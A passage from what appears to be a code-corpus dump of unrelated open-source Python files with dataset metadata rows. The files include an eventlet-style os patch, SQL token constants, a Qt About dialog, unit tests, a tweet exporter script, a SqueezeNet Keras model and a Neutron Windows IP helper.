# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
os_orig = __import__("os")
import errno
socket = __import__("socket")
from evy.support import get_errno
from evy.io.pipes import GreenPipe
from evy.green import threads as greenthread
from evy import hubs
from evy.patcher import slurp_properties
__all__ = os_orig.__all__
__patched__ = ['fdopen', 'read', 'write', 'wait', 'waitpid']
slurp_properties(os_orig, globals(),
ignore = __patched__, srckeys = dir(os_orig))
def fdopen (fd, *args, **kw):
"""
fdopen(fd [, mode='r' [, bufsize]]) -> file_object
Return an open file object connected to a file descriptor."""
if not isinstance(fd, int):
raise TypeError('fd should be int, not %r' % fd)
try:
return GreenPipe(fd, *args, **kw)
except IOError, e:
raise OSError(*e.args)
__original_read__ = os_orig.read
def read (fd, n):
"""
read(fd, buffersize) -> string
Read a file descriptor."""
while True:
try:
return __original_read__(fd, n)
except (OSError, IOError), e:
if get_errno(e) != errno.EAGAIN:
raise
except socket.error, e:
if get_errno(e) == errno.EPIPE:
return ''
raise
hubs.trampoline(fd, read = True)
__original_write__ = os_orig.write
def write (fd, st):
"""
write(fd, string) -> byteswritten
Write a string to a file descriptor.
"""
while True:
try:
return __original_write__(fd, st)
except (OSError, IOError), e:
if get_errno(e) != errno.EAGAIN:
raise
except socket.error, e:
if get_errno(e) != errno.EPIPE:
raise
hubs.trampoline(fd, write = True)
def wait ():
"""
wait() -> (pid, status)
Wait for completion of a child process.
"""
return waitpid(0, 0)
__original_waitpid__ = os_orig.waitpid
def waitpid (pid, options):
"""
waitpid(...)
waitpid(pid, options) -> (pid, status)
Wait for completion of a given child process.
"""
if options & os_orig.WNOHANG != 0:
return __original_waitpid__(pid, options)
else:
new_options = options | os_orig.WNOHANG
while True:
rpid, status = __original_waitpid__(pid, new_options)
if rpid and status >= 0:
return rpid, status
greenthread.sleep(0.01)
# TODO: open
| mit | 8,417,243,514,126,850,000 | 29.07874 | 79 | 0.631675 | false | 3.752456 | false | false | false |
Relrin/aiorest-ws | aiorest_ws/auth/token/utils.py | 1 | 1071 | # -*- coding: utf-8 -*-
"""
Functions and constants, which can be used for work with Token models.
"""
SQL_CREATE_TOKEN_TABLE = """
CREATE TABLE IF NOT EXISTS aiorest_auth_token
(id INTEGER PRIMARY KEY NOT NULL,
name CHAR(64) NOT NULL, -- name of key (admin, api, etc.)
token TEXT NOT NULL,
created DATETIME DEFAULT CURRENT_TIMESTAMP NOT NULL,
expired DATETIME DEFAULT NULL -- for some tokens it doesn't necessary
);
"""
SQL_TOKEN_GET = """
SELECT `id`, `name`, `token`, `created`, `expired`, `user_id`
FROM aiorest_auth_token
WHERE token=?;
"""
SQL_TOKEN_GET_BY_TOKEN_USERNAME = """
SELECT aiorest_auth_token.id, `name`, `token`, `created`,
`expired`, `user_id`
FROM aiorest_auth_token
INNER JOIN aiorest_auth_user
ON aiorest_auth_token.user_id=aiorest_auth_user.id
WHERE name=? AND username=?;
"""
SQL_TOKEN_ADD = """
INSERT INTO aiorest_auth_token (`name`, `token`, `expired`, `user_id`)
VALUES (?, ?, ?, ?);
"""
TOKEN_MODEL_FIELDS = ('id', 'name', 'token', 'created', 'expired', 'user_id')
| bsd-3-clause | -4,285,003,790,112,530,400 | 32.46875 | 77 | 0.633053 | false | 3.275229 | false | false | false |
FrancescoCeruti/linux-show-player | lisp/ui/about.py | 2 | 6223 | # -*- coding: utf-8 -*-
#
# This file is part of Linux Show Player
#
# Copyright 2012-2016 Francesco Ceruti <[email protected]>
#
# Linux Show Player is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Linux Show Player is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Linux Show Player. If not, see <http://www.gnu.org/licenses/>
from collections import OrderedDict
from PyQt5 import QtCore
from PyQt5.QtCore import Qt, QT_TRANSLATE_NOOP
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import QDialog, QGridLayout, QLabel, QWidget, QTabWidget, \
QTextBrowser, QDialogButtonBox
import lisp
from lisp.ui.ui_utils import translate
class About(QDialog):
LICENSE = '''
<p>
Linux Show Player is free software: you can redistribute it and/or<br />
modify it under the terms of the GNU General Public License as published by<br />
the Free Software Foundation, either version 3 of the License, or<br />
(at your option) any later version.<br />
<br />
Linux Show Player is distributed in the hope that it will be useful,<br />
but WITHOUT ANY WARRANTY; without even the implied warranty of<br />
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the<br />
GNU General Public License for more details.
</p>
'''
DESCRIPTION = QT_TRANSLATE_NOOP('AboutDialog',
'Linux Show Player is a cue-player designed for stage productions.')
WEB_SITE = 'http://linux-show-player.sourceforge.net'
USER_GROUP = 'http://groups.google.com/group/linux-show-player---users'
SOURCE_CODE = 'https://github.com/FrancescoCeruti/linux-show-player'
CONTRIBUTORS = OrderedDict({
QT_TRANSLATE_NOOP('About', 'Authors'): [
('Francesco Ceruti', '[email protected]')
],
QT_TRANSLATE_NOOP('About', 'Contributors'): [
('Yinameah', 'https://github.com/Yinameah'),
('nodiscc', 'https://github.com/nodiscc'),
('Thomas Achtner', '[email protected]')
],
QT_TRANSLATE_NOOP('About', 'Translators'): [
('aroomthedoomed', 'https://github.com/aroomthedoomed'),
('fri', 'https://www.transifex.com/user/profile/fri'),
('Luis García-Tornel', '[email protected]'),
('miharix', 'https://github.com/miharix'),
('Olivier Humbert - français', '[email protected]')
],
})
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setWindowModality(QtCore.Qt.ApplicationModal)
self.setWindowTitle(translate('About', 'About Linux Show Player'))
self.setMaximumSize(500, 420)
self.setMinimumSize(500, 420)
self.resize(500, 420)
self.setLayout(QGridLayout())
self.iconLabel = QLabel(self)
self.iconLabel.setPixmap(
QIcon.fromTheme('linux-show-player').pixmap(100, 100))
self.layout().addWidget(self.iconLabel, 0, 0)
self.shortInfo = QLabel(self)
self.shortInfo.setAlignment(Qt.AlignCenter)
self.shortInfo.setText('<h2>Linux Show Player {0}</h2>'
'Copyright © Francesco Ceruti'
.format(str(lisp.__version__)))
self.layout().addWidget(self.shortInfo, 0, 1)
self.layout().addWidget(QWidget(), 1, 0, 1, 2)
# Information tabs
self.tabWidget = QTabWidget(self)
self.layout().addWidget(self.tabWidget, 2, 0, 1, 2)
self.info = QTextBrowser(self)
self.info.setOpenExternalLinks(True)
self.info.setHtml('''
<center><br />{0}<br /><br />
<a href="{1}">{2}</a><br />
<a href="{3}">{4}</a><br />
<a href="{5}">{6}</a><br /><center>'''.format(
translate('AboutDialog', self.DESCRIPTION),
self.WEB_SITE, translate('AboutDialog', 'Web site'),
self.USER_GROUP, translate('AboutDialog', 'Users group'),
self.SOURCE_CODE, translate('AboutDialog', 'Source code'))
)
self.tabWidget.addTab(self.info, translate('AboutDialog', 'Info'))
self.license = QTextBrowser(self)
self.license.setOpenExternalLinks(True)
self.license.setHtml(self.LICENSE)
self.tabWidget.addTab(self.license, translate('AboutDialog', 'License'))
self.contributors = QTextBrowser(self)
self.contributors.setOpenExternalLinks(True)
self.contributors.setHtml(self.__contributors())
self.tabWidget.addTab(self.contributors,
translate('AboutDialog', 'Contributors'))
# Ok button
self.buttons = QDialogButtonBox(QDialogButtonBox.Ok)
self.buttons.accepted.connect(self.accept)
self.layout().addWidget(self.buttons, 3, 1)
self.layout().setColumnStretch(0, 1)
self.layout().setColumnStretch(1, 3)
self.layout().setRowStretch(0, 6)
self.layout().setRowStretch(1, 1)
self.layout().setRowStretch(2, 16)
self.layout().setRowStretch(3, 3)
self.buttons.setFocus()
def __contributors(self):
text = ''
for section, people in self.CONTRIBUTORS.items():
text += '<u><b>{0}:</b></u><br />'.format(translate('About',
section))
for person in people:
text += person[0]
if '://' in person[1]:
text += ' - <a href="{0}">{1}</a>'.format(
person[1], person[1][person[1].index('://')+3:])
elif person[1]:
text += ' - <a href="mailto:{0}">{0}</a>'.format(person[1])
text += '<br />'
text += '<br />'
return text
| gpl-3.0 | 9,202,695,973,476,849,000 | 38.367089 | 85 | 0.604823 | false | 3.751508 | false | false | false |
mnesvold/Boil | test-boiler.py | 1 | 7629 | import os
import shutil
import sys
import tempfile
import unittest
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
import boiler
class BoilerTests(unittest.TestCase):
def setUp(self):
self.boiler = boiler.Boiler()
self.temp_dirs = []
def tearDown(self):
for temp_dir in self.temp_dirs:
shutil.rmtree(temp_dir)
def _mkdtemp(self):
temp_dir = tempfile.mkdtemp(prefix='test-temp-', dir=os.curdir)
self.temp_dirs.append(temp_dir)
return temp_dir
def _write_file(self, filename, contents):
with open(filename, 'w') as f:
f.write(contents)
def _read_file(self, filename):
with open(filename) as f:
return f.read()
def test_templates_dir_default(self):
"""
A Boiler object should expose a `templates_dir` variable which
is a string and defaults to the absolute path of a `.boiler` folder
in the user's home directory.
"""
expected_dir = os.path.abspath(os.path.expanduser('~/.boiler'))
actual_dir = self.boiler.templates_dir
self.assertEqual(expected_dir, actual_dir)
def test_templates_dir_cli_arg(self):
"""
A Boiler object should expose a 'parse_arguments' method
which accepts a `--templates-dir=DIR` argument which sets the Boiler's
`templates_dir` variable.
"""
self.boiler.parse_arguments(['--templates-dir=/foo/bar'])
expected_dir = '/foo/bar'
actual_dir = self.boiler.templates_dir
self.assertEqual(expected_dir, actual_dir)
def test_output_dir_default(self):
"""
A Boiler object should expose an `output_dir` variable which
is a string and defaults to the current directory.
"""
expected_dir = os.curdir
actual_dir = self.boiler.output_dir
self.assertEqual(expected_dir, actual_dir)
def test_output_dir_cli_arg(self):
"""
A Boiler object should expose a 'parse_arguments' method
which accepts a `--output-dir=DIR` argument which sets the Boiler's
`output_dir` variable.
"""
self.boiler.parse_arguments(['--output-dir=../qux'])
expected_dir = '../qux'
actual_dir = self.boiler.output_dir
self.assertEqual(expected_dir, actual_dir)
def test_apply_boilerplate(self):
"""
A Boiler object should expose an `apply_boilerplate` method which
accepts a template name and copies the like-named file from its current
templates_dir folder into its current output_dir folder.
"""
templates_dir = self.boiler.templates_dir = self._mkdtemp()
output_dir = self.boiler.output_dir = self._mkdtemp()
template_name = 'foo.tmpl'
template_path = os.path.join(templates_dir, template_name)
output_path = os.path.join(output_dir, template_name)
self._write_file(template_path, 'Hello, world!')
self.boiler.apply_boilerplate(template_name)
output = self._read_file(output_path)
self.assertEqual(output, 'Hello, world!')
def test_cli_arg_parse_ok(self):
"""
A Boiler object should expose a `parse_arguments` method which returns
True when the arguments parse successfully.
"""
self.assertTrue(self.boiler.parse_arguments([]))
self.assertTrue(self.boiler.parse_arguments(['--templates-dir=/']))
self.assertTrue(self.boiler.parse_arguments(['--output-dir=.']))
def test_cli_arg_parse_fail(self):
"""
A Boiler object should expose a `parse_arguments` method which returns
False if any argument fails to parse.
"""
self.assertFalse(self.boiler.parse_arguments(['--fail']))
self.assertFalse(self.boiler.parse_arguments([
'--templates-dir=/', '--nope']))
def test_stderr(self):
"""
A Boiler object should expose a `stderr` variable which defaults to
`sys.stderr`.
"""
self.assertIs(self.boiler.stderr, sys.stderr)
def test_usage(self):
"""
A Boiler object should expose a `print_usage` method which prints
information to the Boiler's `stderr` variable, then raises 'SystemExit'.
"""
stderr = self.boiler.stderr = StringIO()
with self.assertRaises(SystemExit):
self.boiler.print_usage()
self.assertNotEqual(stderr.getvalue(), '')
def test_template_list_default(self):
"""
A Boiler object should expose a `template_list` variable which defaults
to an empty list.
"""
self.assertEqual(self.boiler.template_list, [])
def test_template_list_cli_arg(self):
"""
A Boiler object should expose a `parse_arguments` method which accepts
positional arguments and uses them to populate the Boiler's
`template_list` variable.
"""
self.boiler.parse_arguments(['foo.tmpl', 'bar', 'bam.qux'])
expected = ['foo.tmpl', 'bar', 'bam.qux']
actual = self.boiler.template_list
self.assertSequenceEqual(expected, actual)
def test_main_ok(self):
"""
A Boiler object should expose a `main` method which forwards its
argument to parse_arguments, then (if parse_arguments returns True)
calls apply_boilerplate with each element of the `template_list`
variable.
"""
parse_argument_calls = []
apply_calls = []
def mock_parse_arguments(args):
self.assertSequenceEqual([], parse_argument_calls)
parse_argument_calls.append(args)
self.boiler.template_list = ['blue', 'red', 'green']
return True
def mock_apply(arg):
apply_calls.append(arg)
self.boiler.parse_arguments = mock_parse_arguments
self.boiler.apply_boilerplate = mock_apply
self.boiler.main(['--foo', '--bar=bam', 'hallo'])
self.assertSequenceEqual([['--foo', '--bar=bam', 'hallo']],
parse_argument_calls)
self.assertSequenceEqual(['blue', 'red', 'green'], apply_calls)
def test_main_empty(self):
"""
A Boiler object should expose a `main` method which forwards its
argument to parse_arguments, then (if template_list is empty)
calls print_usage.
"""
usage_calls = []
def mock_parse_arguments(args):
self.boiler.template_list = []
return True
def mock_usage():
usage_calls.append(0)
self.boiler.parse_arguments = mock_parse_arguments
self.boiler.print_usage = mock_usage
self.boiler.main([])
self.assertSequenceEqual([0], usage_calls)
def test_main_fail(self):
"""
A Boiler object should expose a `main` method which forwards its
argument to parse_arguments, then (if parse_arguments returns False)
calls print_usage.
"""
class MockSystemExit(Exception):
pass
usage_calls = []
def mock_parse_arguments(args):
self.boiler.template_list = ['foo']
return False
def mock_usage():
usage_calls.append(0)
raise MockSystemExit
self.boiler.parse_arguments = mock_parse_arguments
self.boiler.print_usage = mock_usage
with self.assertRaises(MockSystemExit):
self.boiler.main([])
self.assertSequenceEqual([0], usage_calls)
if __name__ == '__main__':
unittest.main()
| mit | 153,866,880,273,420,260 | 35.328571 | 80 | 0.610434 | false | 4.128247 | true | false | false |
ckclark/leetcode | py/insert-delete-getrandom-o1-duplicates-allowed.py | 1 | 1787 | from collections import Counter
import random
class RandomizedCollection(object):
def __init__(self):
"""
Initialize your data structure here.
"""
self.counter = Counter()
self.redundant = Counter()
self.array = []
def insert(self, val):
"""
Inserts a value to the collection. Returns true if the collection did not already contain the specified element.
:type val: int
:rtype: bool
"""
self.counter[val] += 1
if self.redundant[val] == 0:
self.array.append(val)
else:
self.redundant[val] -= 1
return self.counter[val] == 1
def remove(self, val):
"""
Removes a value from the collection. Returns true if the collection contained the specified element.
:type val: int
:rtype: bool
"""
ret = False
if self.counter[val]:
ret = True
self.counter[val] -= 1
self.redundant[val] += 1
return ret
def getRandom(self):
"""
Get a random element from the collection.
:rtype: int
"""
while True:
idx = random.randint(0, len(self.array) - 1)
v = self.array[idx]
if self.counter[v] and (self.redundant[v] == 0 or random.random() * (self.counter[v] + self.redundant[v]) < self.counter[v]):
break
else:
self.array[idx] = self.array[-1]
self.array.pop()
self.redundant[v] -= 1
return v
# Your RandomizedCollection object will be instantiated and called as such:
# obj = RandomizedCollection()
# param_1 = obj.insert(val)
# param_2 = obj.remove(val)
# param_3 = obj.getRandom()
| apache-2.0 | 6,901,476,797,109,974,000 | 27.365079 | 137 | 0.543928 | false | 4.127021 | false | false | false |
pizzaro13/FakeNewsDetector | Exporter.py | 2 | 2515 | # -*- coding: utf-8 -*-
import sys,getopt,got,datetime,codecs
def main(argv):
if len(argv) == 0:
print 'You must pass some parameters. Use \"-h\" to help.'
return
if len(argv) == 1 and argv[0] == '-h':
print """\nTo use this jar, you can pass the folowing attributes:
username: Username of a specific twitter account (without @)
since: The lower bound date (yyyy-mm-aa)
until: The upper bound date (yyyy-mm-aa)
querysearch: A query text to be matched
maxtweets: The maximum number of tweets to retrieve
\nExamples:
# Example 1 - Get tweets by username [barackobama]
python Exporter.py --username "barackobama" --maxtweets 1\n
# Example 2 - Get tweets by query search [europe refugees]
python Exporter.py --querysearch "europe refugees" --maxtweets 1\n
# Example 3 - Get tweets by username and bound dates [barackobama, '2015-09-10', '2015-09-12']
python Exporter.py --username "barackobama" --since 2015-09-10 --until 2015-09-12 --maxtweets 1\n
# Example 4 - Get the last 10 top tweets by username
python Exporter.py --username "barackobama" --maxtweets 10 --toptweets\n"""
return
try:
opts, args = getopt.getopt(argv, "", ("username=", "since=", "until=", "querysearch=", "toptweets", "maxtweets="))
tweetCriteria = got.manager.TweetCriteria()
for opt,arg in opts:
if opt == '--username':
tweetCriteria.username = arg
elif opt == '--since':
tweetCriteria.since = arg
elif opt == '--until':
tweetCriteria.until = arg
elif opt == '--querysearch':
tweetCriteria.querySearch = arg
elif opt == '--toptweets':
tweetCriteria.topTweets = True
elif opt == '--maxtweets':
tweetCriteria.maxTweets = int(arg)
outputFile = codecs.open("output_got.csv", "w+", "utf-8")
outputFile.write('username;date;retweets;favorites;text;geo;mentions;hashtags;id;permalink')
print 'Searching...\n'
def receiveBuffer(tweets):
for t in tweets:
outputFile.write(('\n%s;%s;%d;%d;"%s";%s;%s;%s;"%s";%s' % (t.username, t.date.strftime("%Y-%m-%d %H:%M"), t.retweets, t.favorites, t.text, t.geo, t.mentions, t.hashtags, t.id, t.permalink)))
outputFile.flush();
print 'More %d saved on file...\n' % len(tweets)
got.manager.TweetManager.getTweets(tweetCriteria, receiveBuffer)
except arg:
print 'Arguments parser error, try -h' + arg
finally:
outputFile.close()
print 'Done. Output file generated "output_got.csv".'
if __name__ == '__main__':
main(sys.argv[1:]) | mit | 3,090,110,719,284,948,000 | 30.848101 | 194 | 0.656859 | false | 2.962309 | false | false | false |
GoogleCloudPlatform/keras-idiomatic-programmer | zoo/squeezenet/squeezenet_complex.py | 1 | 4023 | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# SqueezeNet v1.0 with complex bypass (i.e., transition convolution on identify link) (2016)
# Paper: https://arxiv.org/pdf/1602.07360.pdf
import tensorflow as tf
from tensorflow.keras import Input, Model
from tensorflow.keras.layers import Conv2D, MaxPooling2D, Concatenate, Add, Dropout
from tensorflow.keras.layers import GlobalAveragePooling2D, Activation
def stem(inputs):
''' Construct the Stem Group
inputs : input tensor
'''
x = Conv2D(96, (7, 7), strides=2, padding='same', activation='relu',
kernel_initializer='glorot_uniform')(inputs)
x = MaxPooling2D(3, strides=2)(x)
return x
def learner(x):
''' Construct the Learner
x : input to the learner
'''
# First Fire group, progressively increase number of filters
x = group(x, [16, 16, 32])
# Second Fire group
x = group(x, [32, 48, 48, 64])
# Last Fire block
x = fire_block(x, 64)
# Dropout is delayed to end of fire modules
x = Dropout(0.5)(x)
return x
def group(x, filters):
''' Construct a Fire Group
x : input to the group
filters: list of number of filters per block in group
'''
for n_filters in filters:
x = fire_block(x, n_filters)
# Delayed downsampling
x = MaxPooling2D((3, 3), strides=2)(x)
return x
def fire_block(x, n_filters):
''' Construct a Fire Block with complex bypass
x : input to the block
n_filters: number of filters in block
'''
# remember the input (identity)
shortcut = x
# if the number of input filters does not equal the number of output filters, then use
# a transition convolution to match the number of filters in identify link to output
if shortcut.shape[3] != 8 * n_filters:
shortcut = Conv2D(n_filters * 8, (1, 1), strides=1, activation='relu',
padding='same', kernel_initializer='glorot_uniform')(shortcut)
# squeeze layer
squeeze = Conv2D(n_filters, (1, 1), strides=1, activation='relu',
padding='same', kernel_initializer='glorot_uniform')(x)
# branch the squeeze layer into a 1x1 and 3x3 convolution and double the number
# of filters
expand1x1 = Conv2D(n_filters * 4, (1, 1), strides=1, activation='relu',
padding='same', kernel_initializer='glorot_uniform')(squeeze)
expand3x3 = Conv2D(n_filters * 4, (3, 3), strides=1, activation='relu',
padding='same', kernel_initializer='glorot_uniform')(squeeze)
# concatenate the feature maps from the 1x1 and 3x3 branches
x = Concatenate()([expand1x1, expand3x3])
# if identity link, add (matrix addition) input filters to output filters
if shortcut is not None:
x = Add()([x, shortcut])
return x
def classifier(x, n_classes):
''' Construct the Classifier
x : input to the classifier
n_classes: number of output classes
'''
# set the number of filters equal to number of classes
x = Conv2D(n_classes, (1, 1), strides=1, activation='relu', padding='same',
kernel_initializer='glorot_uniform')(x)
# reduce each filter (class) to a single value
x = GlobalAveragePooling2D()(x)
x = Activation('softmax')(x)
return x
# The input shape
inputs = Input((224, 224, 3))
# The Stem Group
x = stem(inputs)
# The Learner
x = learner(x)
# The Classifier
outputs = classifier(x, 1000)
model = Model(inputs, outputs)
| apache-2.0 | 1,582,759,778,911,955,200 | 32.525 | 92 | 0.661695 | false | 3.660601 | false | false | false |
cdd1969/pygwa | tests/test_01.py | 1 | 4619 | from __future__ import print_function
import sys
import os
# hack our sys argv path to match BASEDIRECTORY
sys.argv[0] = os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), os.pardir, 'pygwa.py'))
import unittest
from PyQt5 import QtGui, QtCore
from PyQt5.QtTest import QTest
from PyQt5.QtCore import Qt
import numpy as np
import matplotlib.pyplot as plt
from lib.mainWindow import MainWindow
from lib import projectPath
"""
to run this test
$ git clone https://github.com/cdd1969/pygwa.git pygwa
$ cd pygwa
$ python -m tests.test_01 -v
"""
app = QtGui.QApplication(sys.argv)
plt.ion() #enable matplotlib interactive mode
if '-v' in sys.argv:
log = True
else:
log = False
class FlowchartNodesTest(unittest.TestCase):
'''Test different nodes in PyGWA GUI'''
def setUp(self):
'''Create the GUI'''
self.form = MainWindow()
self.form._unittestmode = True
self.fc = self.form.fc
self.nodeTypes = self.form.uiData.fclib().getNodeList()
def tearDown(self):
plt.close('all')
self.form.close()
del self.form
if log: print('')
def readXLS(self, path=None):
''' Read XLS and return the node'''
if path is None:
# now set test_data file
path = projectPath('../TUTORIALS/test_data.xlsx')
n = self.fc.createNode('readXLS', pos=(0, 0))
p = n.ctrlWidget().param #alias to method
p('Select File').setValue(path)
#set some params...
p('Parameters', 'skiprows').setValue(0)
p('Parameters', 'skip_footer').setValue(0)
p('Parameters', 'na_values').setValue(u'---')
#load data
p('Load File').activate()
return n
def test_01_init(self):
'''Test the GUI in its default state by initializing it'''
print ('sys.argv = ', sys.argv)
def test_02_add_nodes(self):
''' Test GUI by adding number of nodes'''
for nodeType in self.nodeTypes:
if log: print ('\tadding node `{0}`...'.format(nodeType), end='')
self.fc.createNode(nodeType, pos=(0, 0))
if log: print ('ok')
def test_03_node_readXLS(self):
''' Add Node `readXLS`, load data'''
self.readXLS()
def test_04_node_QuickView(self):
''' Connect node QuickView to readXLS and view data'''
readXLS = self.readXLS()
QuickView = self.fc.createNode('QuickView', pos=(0, 0))
self.fc.connectTerminals(readXLS['output'], QuickView['In'])
QTest.mouseClick(QuickView.ctrlWidget().pushButton_viewTable, Qt.LeftButton)
#QuickView.ctrlWidget().twWindow.close()
QTest.mouseClick(QuickView.ctrlWidget().pushButton_viewPlot, Qt.LeftButton)
def test_05_node_TimeseriesPlot(self):
''' Load data, create two curves with node `makeTimeseriesCurve` and plot them with node `TimeseriesPlot`'''
readXLS = self.readXLS()
curve1 = self.fc.createNode('makeTimeseriesCurve', pos=(0, 0))
curve2 = self.fc.createNode('makeTimeseriesCurve', pos=(0, 0))
plotNode = self.fc.createNode('TimeseriesPlot', pos=(0, 0))
self.fc.connectTerminals(readXLS['output'], curve1['df'])
self.fc.connectTerminals(readXLS['output'], curve2['df'])
curve1.ctrlWidget().p.param('Y:signal').setValue(u'River')
curve1.ctrlWidget().p.param('tz correct').setValue(1.2)
self.fc.connectTerminals(curve1['Curve'], plotNode['Curves'])
self.fc.connectTerminals(curve2['Curve'], plotNode['Curves'])
plotNode.ctrlWidget().p.param('Y:Label').setValue('test label')
plotNode.ctrlWidget().p.param('Y:Units').setValue('test units')
plotNode.ctrlWidget().p.param('Crosshair').setValue(True)
plotNode.ctrlWidget().p.param('Data Points').setValue(True)
plotNode.ctrlWidget().p.param('Plot').activate()
def test_06_node_StatisticalAnalysis(self):
''' Load data, perform stat analysis'''
readXLS = self.readXLS()
statAnalysis = self.fc.createNode('Plot Histogram', pos=(0, 0))
self.fc.connectTerminals(readXLS['output'], statAnalysis['In'])
statAnalysis.ctrlWidget().p.param('Signal').setValue('GW_2')
statAnalysis.ctrlWidget().p.param('Signal Units').setValue('test units')
statAnalysis.ctrlWidget().p.param('Histogram Type').setValue('Normalized')
statAnalysis.ctrlWidget().p.param('Bins').setValue(15)
statAnalysis.ctrlWidget().p.param('Plot').activate()
if __name__ == "__main__":
unittest.main()
| gpl-2.0 | -1,722,578,703,316,824,800 | 32.715328 | 116 | 0.628708 | false | 3.564043 | true | false | false |
cs01/gdbgui | gdbgui/htmllistformatter.py | 1 | 1363 | from pygments.formatters import HtmlFormatter # type: ignore
class HtmlListFormatter(HtmlFormatter):
"""A custom pygments class to format html. Returns a list of source code.
Each element of the list corresponds to a line of (marked up) source code.
"""
def get_marked_up_list(self, tokensource):
"""an updated version of pygments.formatter.format_unencoded"""
source = self._format_lines(tokensource)
if self.hl_lines:
source = self._highlight_lines(source)
if not self.nowrap:
if self.linenos == 2:
source = self._wrap_inlinelinenos(source)
if self.lineanchors:
source = self._wrap_lineanchors(source)
if self.linespans:
source = self._wrap_linespans(source)
if self.linenos == 1:
source = self._wrap_tablelinenos(source)
# instead of this:
# for t, piece in source:
# outfile.write(piece)
# evaluate the generator to a list of just source code:
IS_CODE_INDEX = 0
HTML_VALUE_INDEX = 1
IS_CODE_VAL = 1
source_list = [
html_line[HTML_VALUE_INDEX]
for html_line in self._wrap_div(self._wrap_pre(source))
if html_line[IS_CODE_INDEX] == IS_CODE_VAL
]
return source_list
| gpl-3.0 | 7,960,633,443,017,061,000 | 37.942857 | 78 | 0.589875 | false | 4.020649 | false | false | false |
spyysalo/wvlib | relation.py | 1 | 1579 | #!/usr/bin/env python
"""Given phrases p1 and p2, find nearest neighbors to both and rank
pairs of neighbors by similarity to vec(p2)-vec(p1) in given word
representation.
The basic idea is a straightforward combination of nearest neighbors
and analogy as in word2vec (https://code.google.com/p/word2vec/).
"""
import sys
import os
import numpy
import wvlib
from common import process_args, query_loop
def process_query(wv, query, options=None):
vectors = [wv.words_to_vector(q) for q in query]
words = [w for q in query for w in q]
nncount = 100 # TODO: add CLI parameter
nearest = [wv.nearest(v, n=nncount, exclude=words) for v in vectors]
nearest = [[(n[0], n[1], wv[n[0]]) for n in l] for l in nearest]
assert len(nearest) == 2, 'internal error'
pairs = [(n1, n2,
numpy.dot(wvlib.unit_vector(vectors[1]-vectors[0]+n1[2]), n2[2]))
for n1 in nearest[0] for n2 in nearest[1] if n1[0] != n2[0]]
pairs.sort(lambda a, b: cmp(b[2], a[2]))
nncount = options.number if options else 10
for p in pairs[:nncount]:
print '%s\t---\t%s\t%f' % (p[0][0], p[1][0], p[2])
return True
def main(argv=None):
if argv is None:
argv = sys.argv
options = process_args(argv[1:])
try:
wv = wvlib.load(options.vectors, max_rank=options.max_rank)
wv = wv.normalize()
except Exception, e:
print >> sys.stderr, 'Error: %s' % str(e)
return 1
return query_loop(wv, options, process_query, query_count=2)
if __name__ == '__main__':
sys.exit(main(sys.argv))
| bsd-3-clause | -3,324,974,838,855,572,500 | 31.22449 | 79 | 0.628879 | false | 2.996205 | false | false | false |
mahak/neutron | neutron/agent/windows/ip_lib.py | 2 | 2559 | # Copyright 2016 Cloudbase Solutions.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import netifaces
from oslo_log import log as logging
LOG = logging.getLogger(__name__)
class IPWrapper(object):
def get_device_by_ip(self, ip):
if not ip:
return
for device in self.get_devices():
if device.device_has_ip(ip):
return device
def get_devices(self):
try:
return [IPDevice(iface) for iface in netifaces.interfaces()]
except (OSError, MemoryError):
LOG.error("Failed to get network interfaces.")
return []
class IPDevice(object):
def __init__(self, name):
self.name = name
self.link = IPLink(self)
def read_ifaddresses(self):
try:
device_addresses = netifaces.ifaddresses(self.name)
except ValueError:
LOG.error("The device does not exist on the system: %s.",
self.name)
return
except OSError:
LOG.error("Failed to get interface addresses: %s.",
self.name)
return
return device_addresses
def device_has_ip(self, ip):
device_addresses = self.read_ifaddresses()
if device_addresses is None:
return False
addresses = [ip_addr['addr'] for ip_addr in
device_addresses.get(netifaces.AF_INET, []) +
device_addresses.get(netifaces.AF_INET6, [])]
return ip in addresses
class IPLink(object):
def __init__(self, parent):
self._parent = parent
@property
def address(self):
device_addresses = self._parent.read_ifaddresses()
if device_addresses is None:
return False
return [eth_addr['addr'] for eth_addr in
device_addresses.get(netifaces.AF_LINK, [])]
def add_namespace_to_cmd(cmd, namespace=None):
"""Add an optional namespace to the command."""
return cmd
| apache-2.0 | -109,766,519,154,845,980 | 28.079545 | 78 | 0.608832 | false | 4.167752 | false | false | false |
lokokung/Starburst-LabJack-OVRO | gen/gen_starburst_sf.py | 1 | 27052 | """
STARBURST OVRO Item Struct Decomposition
(Based on gen_schedule_sf.py)
Author: Lokbondo Kung
Email: [email protected]
"""
import struct
import numpy as np
import shutil
# NUMBER OF ELEMENTS IN CLUSTERS:
Nelements = 7
Nelements_starburst = 4
Nelements_lonoise = 12
Nelements_antenna = 24
# Version # for Subarray2 stateframe and for
# Starburst-specific stateframe - MUST BE DEFINED HERE
version = 3 # Version Date: 3/31/15
starburst_version = 1 # Version Date: 3/7/15
version_date = '3.31.15' # Most recent update (used to write backup file)
"""
Method: gen_starburst_sf()
